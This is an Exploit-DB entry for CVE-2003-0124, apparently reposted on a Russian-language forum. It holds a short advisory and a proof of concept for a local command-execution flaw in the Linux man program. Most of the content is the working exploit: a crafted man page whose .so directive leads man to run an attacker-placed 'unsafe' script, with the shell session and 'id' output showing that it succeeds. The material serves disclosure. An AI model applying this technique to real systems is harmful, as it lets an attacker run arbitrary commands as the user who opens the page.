- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22344
- Проверка EDB
-
- Пройдено
- Автор
- JACK LLOYD
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2003-0124
- Дата публикации
- 2003-03-11
Код:
source: https://www.securityfocus.com/bid/7066/info
It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.
$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh
echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$- Источник
- www.exploit-db.com
